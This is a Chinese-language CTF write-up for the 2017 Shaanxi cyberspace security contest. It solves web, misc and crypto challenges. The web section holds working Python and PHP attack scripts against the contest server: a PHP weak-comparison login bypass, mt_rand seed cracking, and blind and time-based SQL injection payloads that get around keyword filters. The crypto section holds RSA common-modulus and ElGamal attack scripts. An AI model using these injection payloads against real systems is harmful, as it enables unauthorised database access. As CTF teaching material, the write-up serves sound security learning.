2. 程式人生 > >2017 陝西網路空間安全技術大賽writeup

2017 陝西網路空間安全技術大賽writeup

阿新 發佈:2019-01-14

WEB

簽到題

點開後是一個登陸框,直接檢視原始碼得到關鍵程式碼

<!--  if (isset($_GET['Username']) && isset($_GET['password'])) {
           $logined = true;
        $Username = $_GET['Username'];
        $password = $_GET['password'];

        if (!ctype_alpha($Username)) {$logined = false;}
        if (!is_numeric($password
 
) ) {$logined = false;}
        if (md5($Username) != md5($password)) {$logined = false;}

        if ($logined){
            echo "successful";
        } else {
            echo "login failed!";
        }
    }
-->

弱型別比較,使username=QNKCDZO;password=240610708,進入下一關

<!--  if (isset($_POST['message'
 
])) {
    $message = json_decode($_POST['message']);
    $key ="*********";
    if ($message->key == $key) {
        echo "flag";
    } 
    else {
        echo "fail";
    }
 }
 else{
     echo "~~~~";
 }
-->

直接構造
這裡寫圖片描述

抽抽獎

Jsfuck 還有aaencode 的編碼,有點大,還是除錯js

(function() {
    window.rotateFunc = function
 
(awards,angle,text){  

        $('#lotteryBtn').stopRotate();

        $("#lotteryBtn").rotate({

            angle:0, 

            duration: 5000, 

            animateTo: angle+1440, 

            callback:function(){

                getFlag(text);

            }

        }); 

    };
})

直接點選下面的getFlag函式

(function() {
window.getFlag=function(text){     if(text=='1'){         alert("你最厲害啦!可惜沒flag")     }     if(text=='2'){         alert("你太厲害了,竟然是二等獎")     }     if(text=='3'){         alert("你好厲害,三等獎啊")     }     if(text=='flag'){         alert("flag{951c712ac2c3e57053c43d80c0a9e543}")     }     if(text=='0'){         alert("再來一次吧")     } }
})

繼續抽

關鍵程式碼

$(function() {
    var rotateFunc = function(jsctf0, jsctf1, jsctf2) {
        $('token.php').stopRotate();
        $("#lotteryBtn").rotate({
            angle: 0x0,
            duration: 0x1388,
            animateTo: jsctf1 + 0x5a0,
            callback: function() {
                $.get('get.php?token=' + $("#token").val() + "&id=" + encode(md5(jsctf2)), function(jsctf3) {
                    alert(jsctf3['text'])
                }, 'json');
                $.get('token.php', function(jsctf3) {
                    $("#token").val(jsctf3)
                }, 'json')
            }
        })
    };
    $("#lotteryBtn").rotate({
        bind: {
            click: function() {
                var jsctf0 = [0x0];
                jsctf0 = jsctf0[Math.floor(Math.random() * jsctf0.length)];
                if (jsctf0 == 0x1) {
                    rotateFunc(0x1, 0x9d, 1)
                };
                if (jsctf0 == 0x2) {
                    rotateFunc(0x2, 0xf7, 2)
                };
                if (jsctf0 == 0x3) {
                    rotateFunc(0x3, 0x16, 3)
                };
                if (jsctf0 == 0x0) {
                    var jsctf1 = [0x43, 0x70, 0xca, 0x124, 0x151];
                    jsctf1 = jsctf1[Math.floor(Math.random() * jsctf1.length)];
                    rotateFunc(0x0, jsctf1, '\x30')
                }
            }
        }
    })
})

encode

function encode(string) {
    var output = '';
    for (var x = 0, y = string.length, charCode, hexCode; x < y; ++x) {
        charCode = string.charCodeAt(x);
        if (128 > charCode) {
            charCode += 128
        } else if (127 < charCode) {
            charCode -= 128
        }
        charCode = 255 - charCode;
        hexCode = charCode.toString(16);
        if (2 > hexCode.length) {
            hexCode = '0' + hexCode
        }
        output += hexCode
    }
    return output
}

通過檢視一些js程式碼,可知是跟text的值有關,但嘗試幾個都不對,直接爆破好啦,注意:這個必須繫結token,所以有一個讀取token的程式碼
附上Mirage隊伍的指令碼(小小的改動了一下)

import requests
import hashlib

def encode(str):
    end = ""
    for s in str:
        if ord(s)<128:
            end+="%x"%(255-(ord(s)+128))
        if ord(s)>127:
            end+="%x"%(255-(ord(s)-128))
    return end
flag = []

cookies = {'PHPSESSID': '2coc93voijtnq8ms9iu8rqe391'}

for x in range(1,200):
    r = requests.get("http://117.34.111.15:81/token.php",cookies=cookies)
    m = hashlib.md5(str(x)).hexdigest()
    print x
    #print "http://117.34.111.15:81/get.php?token="+r.text[1:-1]+"&id="+encode(m)
    s = requests.get("http://117.34.111.15:81/get.php?token="+r.text[1:-1]+"&id="+encode(m),cookies=cookies)
    flag.append(s.text)
    if "flag{" in s.text:
        print s.text
        break

得到flag
這裡寫圖片描述

Wrong

檢視原始碼啥也沒得到,嘗試找下備份,發現.index.php.swp,修復一下即可得到程式碼

<?php
error_reporting(0);
function create_password($pw_length =  10)
{
$randpwd = "";
for ($i = 0; $i < $pw_length; $i++)
{
$randpwd .= chr(mt_rand(33, 126));
}
return $randpwd;
}

session_start();
mt_srand(time());


$pwd=create_password();
echo $pwd.'||';    
if($pwd == $_GET['pwd'])
{
    echo "first";
  if($_SESSION['userLogin']==$_GET['login'])
        echo "Good job, you get the key";
}
else
{echo "Wrong!";}

$_SESSION['userLogin']=create_password(32).rand();
?>

看來這是一個爆破隨機數種子的題,後面的login繞過就使session置空,然後login=
指令碼

<?php

function create_password($pw_length =  10)
{
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++)
    {
        $randpwd .= chr(mt_rand(33, 126));
    }
    return $randpwd;
}
session_start();

for($i=time()-10;$i<time()+10;$i++)
{
    mt_srand($i);
    $pwd=create_password();
    $curl=file_get_contents("http://117.34.111.15:85/index.php?pwd=$pwd&login=");
    echo $curl.'<br>';
}

?>

這裡寫圖片描述

注:有時候總是得不到,是因為種子範圍太小,可以直接放大

so easy!

 <?php 

include("config.php");

$conn ->query("set names utf8");

function randStr($lenth=32){
    $strBase = "1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm";
    $str = "";
    while($lenth>0){
      $str.=substr($strBase,rand(0,strlen($strBase)-1),1);
      $lenth --;
    }
   return $str;
}

if($install){
    $sql = "create table `user` (
         `id` int(10) unsigned NOT NULL PRIMARY KEY  AUTO_INCREMENT ,
         `username` varchar(30) NOT NULL,
         `passwd` varchar(32) NOT NULL,
         `role` varchar(30) NOT NULL
       )ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci ";
    if($conn->query($sql)){
       $sql  = "insert into `user`(`username`,`passwd`,`role`) values ('admin','".md5(randStr())."','admin')";
       $conn -> query($sql);
    }
}

function filter($str){
     $filter = "/ |\*|#|;|,|is|union|like|regexp|for|and|or|file|--|\||`|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%a0')."/i"; 
     if(preg_match($filter,$str)){
         die("you can't input this illegal char!");
     }
     return $str; 

}


function show($username){
  global $conn;
  $sql = "select role from `user` where username ='".$username."'";
  $res = $conn ->query($sql);
  if($res->num_rows>0){

      echo "$username is ".$res->fetch_assoc()['role'];
  }else{
      die("Don't have this user!");
  }
}

function login($username,$passwd){
    global $conn;
    global $flag;

    $username = trim(strtolower($username));
    $passwd = trim(strtolower($passwd));
    if($username == 'admin'){
        die("you can't login this as admin!");
    }

    $sql = "select * from `user` where username='".$conn->escape_string($username)."' and passwd='".$conn->escape_string($passwd)."'";
    $res = $conn ->query($sql);
    if($res->num_rows>0){
        if($res->fetch_assoc()['role'] === 'admin') exit($flag);
    }else{
       echo "sorry,username or passwd error!";  
    }

}

function source(){

    highlight_file(__FILE__);
}

$username = isset($_POST['username'])?filter($_POST['username']):"";
$passwd = isset($_POST['passwd'])?filter($_POST['passwd']):"";

$action = isset($_GET['action'])?filter($_GET['action']):"source";

switch($action){
   case "source": source(); break ;
   case "login" : login($username,$passwd);break;
   case "show" : show($username);break;
}

雖然過濾這麼多,但密碼隨機,看來是一道sql注入
通過測試發現action=show頁面可以進行注入,得到密碼
通過查詢一堆的姿勢,發現/and相同,由於末尾有'只能用1=1=1邏輯進行繞過
指令碼

import requests

url="http://117.34.111.15:89/?action=show"

flag=''
for x in range(1,33):
    for i in range(33,125):
        con="admin'/(ascii(substr((select(passwd)from(user))from(%d)))<%d)=1='1" % (x,i)
        payload={
            "username": con
        }
        s=requests.post(url,data=payload)
        if 'admin'  in s.content:
            flag += chr(i-1)
            print flag
            break

這裡寫圖片描述

由於有個admin的驗證,直接寬位元組注入即可
這裡寫圖片描述

just a test

一開啟就是一個站,一臉蒙逼,先掃掃試試,發現有一堆一堆的sql注入可以利用,找一個點嘗試一下
這裡寫圖片描述

這裡寫圖片描述

居然出現錯誤了,仔細觀察發現#沒上去,二次url編碼一下
這裡寫圖片描述

發現出現延遲,確定是sql注入

方法1:

嘗試注入吧,這裡有個大坑,一開始拿指令碼開始爆破資料庫長度為5,資料庫為test1
這裡寫圖片描述

但是test1只是當前資料庫,而不是flag所在的資料庫,後來都行不通後嘗試扔sqlmap中去跑,倒是跑出所有資料庫
這裡寫圖片描述

既然test1不行,換test試試
跑出表明[email protected]
這裡寫圖片描述

這裡寫圖片描述

結果列名sqlmap跑不出來,只能拿指令碼爆破
這裡寫圖片描述

結果跑出來倆,必須是第二個,先試試sqlmap,一下就出來啦,無語
這裡寫圖片描述

還是試試指令碼

import requests
import urllib, urllib2, time
dic='123456789abcdefghijklmnopqrstuvwxyzQWERTYUIOPASDFGHJKLZXCVBNM'
flag = ''
'''
for i in range(1,8):
    #url = "http://117.34.111.15:83/vogati' union select if((select length(database()))={0},sleep(3),0)%2523".format(i)
    url = "http://117.34.111.15:83/vogati' union select if((length((select group_concat(table_name) from information_schema.tables where table_schema=0x74657374 limit 1)))={0},sleep(3),0)%2523".format(i)

    print url
    start_time = time.time()
    requests.get(url)
    times = time.time() - start_time

    if times > 2:
        print i
        break
print flag
#database() 5
#table 4
'''

for i in range(1,15):
    for j in xrange(33,127):
        url = "http://117.34.111.15:83/vogati' union select if(ascii(substr((select group_concat(database()) limit 1),{0} ,1))={1},sleep(3),0)%2523".format(i,j)
        #url = "http://117.34.111.15:83/vogati' union select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x74657374 limit 1),{0},1))={1},sleep(3),0)%2523".format(i,j)
        #url = "http://117.34.111.15:83/vogati' union select if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x666c4067 limit 1),{0},1))={1},sleep(3),0)%2523".format(i,j)
        #url = "http://117.34.111.15:83/vogati' union select if(ascii(substr((select f1ag from test.`[email protected]` limit 1),{0},1))={1},sleep(5),0)%2523".format(i,j)
        start_time = time.time()
        requests.get(url)
        times = time.time() - start_time
        if times > 4:
            flag += chr(j)
            print chr(j)
            break
print flag


#database() test1
#[email protected]
#f1ag

響應還是有點問題,為了確保還是試試下一個方法

方法2:報錯注入

表名
這裡寫圖片描述

列名
這裡寫圖片描述

flag
這裡寫圖片描述

由於顯示的問題,直接分片偏移一下就行
這裡寫圖片描述

MISC

一維碼

這裡寫圖片描述

LSB解密,直接摳出來
儲存後檢視是tar,看來是利用hydan隱寫的,直接利用工具解密即可,密碼就是hydan
這裡寫圖片描述

什麼玩意

下載下來兩個檔案真是一臉蒙逼,開啟whatisthat看的時候居然找到Protocol,LMP,XiAn,度娘好啦
得知這個協議是一個藍芽協議,看來是一個關於藍芽的解碼題
百度連結:http://book.51cto.com/art/201011/236037.htm
根據上面直接跟著操作

軌跡

先看一下檔案的型別吧
這裡寫圖片描述

居然是資料包,丟進wireshark
是一堆USB資料
這裡寫圖片描述

好坑啊,看不清
flag{stego_xat[email protected]}

種棵樹吧

下載下來是一個壓縮包,解壓有兩個圖片,對第一張利用binwalk開始分析
這裡寫圖片描述

發現有壓縮包,並且應該藏著一張.gif檔案,摳出來解壓,一張沒有頭部的,新增頭部,然後靜態分析
這裡寫圖片描述

這裡寫圖片描述

這裡寫圖片描述

即:In-order{RY!heHVaL-goAI{dxj_GpnUw8}kzuEr:s56fFl2i}
圖片2由於沒什麼隱藏,就直接notepad++開啟看到字串
Post-order{YR!eVa-gLAoxd_j{pw}8zkUnGuIHh:r65f2lFsEi*}
聯絡樹的含義,看來是個二叉樹
畫一畫得到結果hi!HEReIsYouFLAG:flag{n52V-jPU6d_kx8zw}

我們的祕密

先進行分析
這裡寫圖片描述

是個zip檔案
利用binwalk發現裡面有兩個
這裡寫圖片描述

分離後第一個需要密碼,第二個直接用7z開啟裡面有一個txt,沒什麼意義,看來是需要進行明文攻擊
這裡寫圖片描述

得到密碼3xatu2o17
然後解壓得到兩個
第二個WAV聽起來是莫爾斯碼,處理一下
這裡寫圖片描述

轉換一下-.-. - ..-. ... . -.-. .-- .- .-. ..--- ----- .---- --...,解碼即CTFSECWAR2017
第一個mp4看起來沒東西,可能是視訊隱寫,畢竟都有密碼啦
利用OurSecret解密
這裡寫圖片描述

Crypto

簽到

base64加密
這裡寫圖片描述

crypt1(復現)

這裡寫圖片描述

通過原理就可以進行指令碼的書寫,由於加解密的指令碼已給,只需要進行素數的判定和窮舉即可
這裡寫圖片描述

得到key1,key2,在解密即可
這裡寫圖片描述

指令碼(來自官方)

# -*- coding: utf-8 -*
import RC2
#(38593, 13433911) 
#print RC2.decrypt(cipher_text1,'38593','13433911') 
#RC2.encrypt(plain_text,'38593','13433911')

plain_text ='flag{'
cipher_text1 ="|\xd6-\x14?\xb9\xa1\x86\x81\xa4\xdc\x950\x941'V'\xaf"
def isprime(n):
    if n <= 1: 
        return False 
    if n == 2: 
        return True 
    if n %2 == 0: 
        return False 
    for i in range(3,int(n**0.5)+1,2): 
        if n %i == 0: 
            return False 
    return True
data = dict() 
for key1 in xrange(0,2**24): 
    data[RC2.encrypt_data(plain_text,str(key1))] =key1

for i in xrange(0,2**24): 
    try: 
        a = RC2.decrypt_data(cipher_text1,str(i)) 
        if isprime(data[a[:5]]) == True and isprime(i) == True: 
            print (data[a[:5]],i) 
    except : 
        pass

crypt2

開啟後簡簡單單的4個數據包,猜測是RSA,又看見其中的PUBLICN一樣,看來需要利用RSA共模攻擊直接指令碼
指令碼

#coding=utf-8 

import sys

def egcd(a, b): 
    if a == 0: 
        return (b, 0, 1) 
    else: 
        g, y, x = egcd(b % a, a) 
        return (g, x - (b // a) * y, y) 

def modinv(a, m): 
    g, x, y = egcd(a, m) 
    if g != 1: 
        raise Exception('modular inverse does not exist') 
    else: 
        return x % m 

def main(): 
    n = 295722865793798033460986793237541395631977030560369657198479193181766567057754287459743723539658396944636677358515648785314565228205230261697963097395812598331880872455869139731578362748460265979187318613591087019956434720952036757300875287830045303192314296720794872499471775336492552983354160440794987630219

    e1 = 3
    e2 = 7
    c1 = 15839981826811799772634108807452583389456749354145216574984222938829756753294086924872110969732766251541785740757693788214686206806750788561292837339359061701208001297802597
    c2 = 155249880144094802834481749928592059461139577288355397447367776112547796231086359709731959934830872744121046740255722326833958323017063249153808715277882003426237167195613685868065416967276090907468102632169601247074603247233477582113388294508579159856963458656960060635516531998836585340648309492666005454968
    s = egcd(e1, e2) 
    s1 = s[1] 
    s2 = s[2] 
    # 求模反元素 
    if s1<0: 
        s1 = - s1 
        c1 = modinv(c1, n) 
    elif s2<0: 
        s2 = - s2 
        c2 = modinv(c2, n)

    #m = (c1**s1)*(c2**s2)%n 
    m = (pow(c1,s1,n)*pow(c2,s2,n))%n  #效率較高
    print m 

if __name__ == '__main__': 
    sys.setrecursionlimit(1000000) #例如這裡設定為一百萬  
    main()

得出結果
這裡寫圖片描述

轉化即得flag
這裡寫圖片描述

crypt3-elgamall(復現)

開啟是演算法

Elgamal公鑰演算法
p=27327395392065156535295708986786204851079528837723780510136102615658941290873291366333982291142196119880072569148310240613294525601423086385684539987530041685746722802143397156977196536022078345249162977312837555444840885304704497622243160036344118163834102383664729922544598824748665205987742128842266020644318535398158529231670365533130718559364239513376190580331938323739895791648429804489417000105677817248741446184689828512402512984453866089594767267742663452532505964888865617589849683809416805726974349474427978691740833753326962760114744967093652541808999389773346317294473742439510326811300031080582618145727L
g=5
pubkey= 15897134744603412407236340130903515843905595787916104657385519422986426345115823686810853107481694865775913467114024913677335733894667792798395737569953849256882861414952399033485502243404713926200118812354039741107644139745006955253583455274886964967225553722035103514031122271234784040261201020226057012096511938211174167656870379685617680291810128637980892370691572490691519829076783461109306590095484179440862495482835514470915461945970795413256156820437342587014038955991776434408677693566169588551847744742286874738315251398924077333252631511215605564897611397211382716723267549879729623306978333824259701644870
一半密文如下:
c2= [9771623932201733623958150190631898238891754674135016656173609454664781466401551373204230952581233581865473408039422744440232905405398138212912191325695750045453569941256147291250743556181733400816972976317748155577105285436653775849672801996204639875757864579907521541068077727695973833164967006557973521661951243118363079400627978261421881771361089184908937136705776910863952045936314459879953992672875504411266256582867046231099147858435807800552180587849018284789025825653155673899666954684890178399661554285310683351234583574417572953320622751175440376584396202371798700038971177213305400000804047817365103597382L, 14608293105501574503533259652579881424995988390885823565679732496177568728511937704817201530076573346617111605453294336192067719761379531231098823411766207916782525829553129273823226211177683798147559861760420639462488268102001975546954608037969287264182655610169290251797305868582689176357731553706394044746628830702014052597514707521018607966794835040871452631571495890025650348182808849642134806590235286182610672200970211296938894270988067627960195359367340260905757119205476791839772978296144481884247215884541679520712146523595176218787631010319115645819295808557440120080946196671793900915518512124958676065376L, 9701316872178874846131909603470837070515849918871635394596635817602152040037758568845028164922002284900665851973147569334369066504196131383562032110790839060301863157812096185742485638931122263862549570546428668634595747360007381582436669715688094861157769455061671616674330644206636212107541595737687176098553194392037200344339145461027514789146511976689042948676862700511488680465590973158039934046618613944664154133829633215518696845568285886493117224832818580913287592606952192738778042680002129042467036739921365192572078566859247563413236170772297224851089558735280032253583027391158154069805131757137610678840L, 11963086014345645422322480482894431793581354146999372322325391079434149872151420661315139375005326461429869710486795192425324383468316847456631476826575508960580303109655105203822670842716255932793740749546379823243172212707754756762751440785326903161706490592119944809533728933780302278229297543582110129725320675591598098351401400802676857017127006312000319093202574888278054601106384515988193420243740669510734279386193941907005100716574153069402283282890358032903663012216465660623259000719273256537180954384366979669998063272181493468076254720979391007317216551824004953330870975733699175783259723885472291390247L]

指令碼(官方)


import binascii 
prime =27327395392065156535295708986786204851079528837723780510136102615658941290873291366333982291142196119880072569148310240613294525601423086385684539987530041685746722802143397156977196536022078345249162977312837555444840885304704497622243160036344118163834102383664729922544598824748665205987742128842266020644318535398158529231670365533130718559364239513376190580331938323739895791648429804489417000105677817248741446184689828512402512984453866089594767267742663452532505964888865617589849683809416805726974349474427978691740833753326962760114744967093652541808999389773346317294473742439510326811300031080582618145727L
g=5 
a=25068846673504649115013073204159551504077335388550230633916403745750246234700116848856658545794004828756011545491278286109627909119064932824318045632019480569837416672875776541337368023231944590490411760253202092483808095200967796197977981916982617237783161334496865286858293982227033097181473033945645887826660578179968969606115788410184864335869939046680461540228612601790548156930331249872426448165169562147455277630515803154329189762403617436554089752405120434751512261207786540113077887070082618511120708688069372803543422623986996708285225792456858415217112853089594868585882736142092012577812600140885857456632L 
k=26444351772744893610205822500959482360769718695092697894733753449933019781845344787499328648121750641746551162853416774477909358285085068254363239016953842524072388260038167528939819968951257826131182857000313466814953494862084762751423673172957828265607677303539135866191354071397335740151910699852806045702422080864164622449015507083272338330880655795388073802136822438755728076839723514328729105950595774119626073789093134289438572677600391940406193069605947785986809219643481170701636744366717830605945548543292921429151730865748718046788399635983462509470009348745793498517786531256048637622970123356769436921467L 
m='flag{eAsyPr0b1emtoSolve}'
'''
利用擴充套件的歐幾里德(extended Euclid)演算法演算法來求金鑰 e 的模 Z 乘法逆元
公式:d*e =1 mod Z 
已知:e, Z
求 e 的 mod Z的乘法逆元 
返回: d= e^(-1) mod Z
'''
def extended_Euclid(e,z): 
    (x1, x2, x3) =(1, 0, z) 
    (y1, y2, y3) =(0, 1, e) 
    while True: 
        if y3== 0:
            return False 
        if y3== 1: 
            return y2 
        div = x3 /y3 
        (t1, t2, t3) =(x1 -div*y1, x2 - div*y2, x3 - div*y3) 
        (x1, x2, x3) =(y1, y2, y3) 
        (y1, y2, y3) =(t1, t2, t3)

print len(m) 
mint=[] 
c1=[] 
c2=[] 
print 'message(int)' 
for i in range(len(m)/6): 
    mint.append(int(binascii.b2a_hex(m[i*6:i*6+6]),16)) 
    print mint[i] #string-->Hex-->int 
    b=pow(g,a,prime)
    print 'pubkey=',b 
    c1.append(pow(g,k,prime)) 
    #print 'c1=',c1 
    c2.append(pow(mint[i]*pow(b,k,prime),1,prime)) 
    print 'c2=',c2 
    c1a=pow(c1[i],a,prime) 
    c1ainv=extended_Euclid(c1a,prime) 
    mm=pow(c2[i]*c1ainv,1,prime) 
    print 'mm=',binascii.unhexlify(hex(mm)[2:-1]) 
print 'crackbegin , use the c2 infoonly' 
message1=112615676672869 # assumption the first message is known 
bktemp=extended_Euclid(message1,prime) 
bk=pow(c2[0]*bktemp,1,prime) 
#print 'bk=',bk 
#print pow(b,k,prime) 
for i in range(len(m)/6): 
    bkinv=extended_Euclid(bk,prime) 
    print 'mesaage',i,'=' 
    mm=pow(c2[i]*bkinv,1,prime) 
    print binascii.unhexlify(hex(mm)[2:-1])

這裡寫圖片描述

相關推薦

2017 陝西網路空間安全技術大賽writeup

WEB 簽到題 點開後是一個登陸框,直接檢視原始碼得到關鍵程式碼 <!-- if (isset($_GET['Username']) && isset($_GET['password'])) { $lo

2017年陝西省網路空間安全技術大賽·Mobile T5

0x00前言由於第四題較直接,一個md5的比較,fa3733c647dca53a66cf8df953c2d539通過md5查詢解密出來是monkey99,然後真碼就是monkey99了。這個第五題是混淆。理清邏輯還是不算難的。0x01java程式碼分析1.沒有apk檔案,只有

網路空間安全技術大賽 misc2 writep

msic2 xiyangyang.rar解壓發現是喜洋洋的音樂,然後就猜是不是音訊隱寫,不過用了一大堆工具檢視.並沒有發現什麼.然後....然後就沒有解出來了>_<----------------------------------分割線-------------

A__Writeup“百越杯”第四屆福建省高校網路空間安全大賽——致我的戰隊HeroCat的所有成員

    作  者:HeroCat出  處:https://www.cnblogs.com/HeroCat/ 特此宣告:歡迎園子的大大們指正錯誤,共同進步。如有問題或建議,也請各位大佬多多賜教!如果您覺得文章對您有幫助,可以點選文章右下角【推薦】一下。版權宣告:本文版權歸作

2018~第三屆南寧市網路安全技術大賽~nnctf~write-up

Web 1.超簡單 分值:100 型別:WEB 已解決 題目:超簡單的web題  http://gxnnctf.gxsosec.cn:12311/   程式碼審計 <?php $white_list = range(0,

效率源與西工大網路空間安全學院簽署戰略合作協議

為推動網路資訊前沿技術的突破創新,促進網信技術廣泛應用以及產業鏈構建,助力企業轉型升級、區域經濟蓬勃發展,並更好地開展網信人才培養工作,第二屆中國(西安)網路創新發展論壇暨網路空間安全學院成立大會於2018年10月11日在西安成功舉行。 效率源應邀參加這一行業盛會,並在西北工業大

吳建平院士:網路空間安全的挑戰和機遇

從網際網路到網路空間   二十世紀後期有兩項最重大的戰略工程,由美國人發起並且實施的,全球都因此受惠,一個是星球大戰計劃,另一個,就是網際網路計劃,網際網路逐步發展、影響了社會的各個方面。   網際網路的核心是它的體系結構,網路層承上啟下,保證全網通達,是體系結構的核

CCF推薦會議和期刊----網路空間安全

中國計算機學會推薦國際學術會議  (網路與資訊保安) 一、A類 二、B類 序號 會議簡稱 會議全稱 出版社 網址 1 ACSAC Annual Computer Security Applications  Conference

2019-2020-1學期 20192407《網路空間安全專業導論》第七週學習總結

摘要 第十二章 資訊管理 通過對第十二章的自學學習,我學到了: 資訊系統:幫助我們組織和分析資料的軟體。 電子表格:基於可擴充套件的公式,進行基本資料分析的方便的工具,這些公式定義了資料之間的關係。 資料庫管理系統:面向管理大量常常被搜尋的資料,並將其組織成相應的小節。 電子製表軟體:允許使用者用單元格組織和

第三屆“百越杯”福建省高校網絡空間安全大賽writeup--Do you know upload?

.sql image 成功 文件 開始 源碼 bsp 打開 fab 一打開網址,可以看出應該是文件上傳漏洞,查看源碼,也有可能是文件包含 上傳個圖片,成功,然後上傳一句話木馬 通過bp進行上傳繞過 , 開始菜刀連接http://e00b6eca3c9c4e14a31

山東省網路安全技能大賽 部分writeup

web1 提示:ip不在範圍內 直接抓包加client-ip: 127.0.0.1 即可得到flag web2 <?php    include 'here.php';    $key =&n

第七屆山東省大學生網路安全技能大賽決賽writeup

先立個flag,以後每次比賽完都要復現寫WP… Crypto-affine(6pts) y = 17*x-8 flag{szzyfimhyzd} 仿射加密,指令碼 a = 'szzyfimhyzd' a1=[] for i in a: a2 = o

Gartner: 2017年11大信息安全技術(解讀版)

gartner cwpp edr nta mdr devsecops 在2017年6月份舉辦的第23屆Gartner安全與風險管理峰會上,Gartner的Fellow——Neil McDonald發布了2017年度的11個最新最酷的信息安全技術,比往年的10大技術多了一項。以往都是通過

藍盾杯網絡空間安全攻防對抗大賽小記

藍盾杯 攻防對抗 比賽 ctf flag9月17日帶隊在山東大學軟件學院參加了山東省第六屆藍盾杯網絡攻防對抗大賽,這是第一次參加藍盾杯的比賽,本來只是想去實戰練兵,沒想到竟然拿了一等獎,確實有些意料之外的驚喜。這次比賽分為挑戰賽和對抗賽兩個環節,挑戰賽是標準的CTF試題,比如Web、逆向、隱寫等等,這些內容基

2017年教育部-永信至誠產學合作協同育人網絡空間安全專業課程教學研討會」參會總結

htm markdown 空間 博客園 html 教育部 jpg 實踐 http 「2017年教育部-永信至誠產學合作協同育人網絡空間安全專業課程教學研討會」參會總結 網絡空間安全導論 歡迎關註“rocedu”微信公眾號(手機上長按二維碼) 做中教,做中學,實踐中共同進步

2016-2017-1 20155215 信息安全技術 補課上測試

debug 序列 tube which amp 什麽是 proc shell 漏洞 2016-2017-1 20155215 信息安全技術 補課上測試 因為沒有及時提交課上的測試成績,所以我在課後做了一些關於惡意代碼的學習,作為一個補充提交項。 惡意代碼分析技術。

2017-2018-1 20155321 20155330 《信息安全技術》 實驗四 木馬及遠程控制技術

以及 刪除文件 相關 成對 命令 剖析 services 虛擬 特殊 《信息安全技術》 實驗四 木馬及遠程控制技術 實驗名稱: 木馬及遠程控制技術 姓名: 林汝婷、朱玥 學號: 20155321、20155330 班級: 1553 日期: 2017.11.21 一、 實驗目

2017-2018-1 20155318 20155328《信息安全技術》實驗四 木馬及遠程控制技術

啟動 菜單 mac 通知 通過 圖片 資源管理器 配置服務 文件監控 2017-2018-1 20155318 20155328《信息安全技術》實驗四 木馬及遠程控制技術 實驗目的 析網頁木馬的工作原理 解木馬的植入過程 會編寫簡單的網頁木馬腳本 過分析監控信息實現手動刪

雲聚天下聯接未來|2018年華為網路技術大賽完美收官

 [中國,深圳,5月27日] 2018年5月27日,持續了近3個月的2018年華為網路技術大賽在萬眾矚目中圓滿收官。來自西北賽區聯隊“255.255.255.255”從全球萬餘名參賽學生中脫穎而出,斬獲本屆大賽的總冠軍;江山賽區(江蘇、山東)聯隊“江山一嘯”和西北賽區西安電子科技大學

新疆首屆安全知識技能大賽writeup

總是把比賽想的太簡單,原來在哪裡總是藏龍臥虎,不能小瞧任何人,也別高看了自己。但是這是第一次參加不讓聯網的CTF比賽! stay foolish,stay hungry 如來十三掌 通過這個題目,讓我聯想到與佛論禪和rot13加密,那麼開啟題目,下載下來一個